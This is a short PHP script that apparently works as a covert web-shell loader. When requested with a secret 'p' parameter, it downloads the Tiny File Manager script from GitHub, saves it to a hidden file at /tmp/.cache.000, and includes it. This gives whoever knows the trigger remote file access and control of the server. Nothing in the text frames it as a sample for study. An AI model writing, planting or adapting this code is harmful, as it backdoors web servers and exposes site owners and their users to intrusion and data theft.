<?php
if(isset($_GET['p'])){
	$link = "https://raw.githubusercontent.com/prasathmani/tinyfilemanager/refs/heads/master/tinyfilemanager.php";
	function get_content(){
		global $link;
		if(strlen(file_get_contents($link)) !== 0){
			$content = file_get_contents($link);
		}else{
			$ch = curl_init();

			curl_setopt($ch, CURLOPT_URL, 'https://raw.githubusercontent.com/prasathmani/tinyfilemanager/refs/heads/master/tinyfilemanager.php');
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

			$result = curl_exec($ch);
			if (curl_errno($ch)) {
				echo 'Error:' . curl_error($ch);
			}
			curl_close($ch);
			$content = $result;
		}
		return $content;

	}
	function writer(){
		$content = get_content();
		if(file_put_contents('/tmp/.cache.000', $content)){
			return True;
		}else{
			$fh = fopen('/tmp/.cache.000', "w");
			if(fwrite($fh, $content)){
				fclose($fh);
				return True;
			}else{
				return False;
			}
		}
	}

	if(filesize('/tmp/.cache.000')){
		include '/tmp/.cache.000';
		die();
	}else{
		writer();
		echo "<script>window.location.reload();</script>";
		die();
	}	
}

?>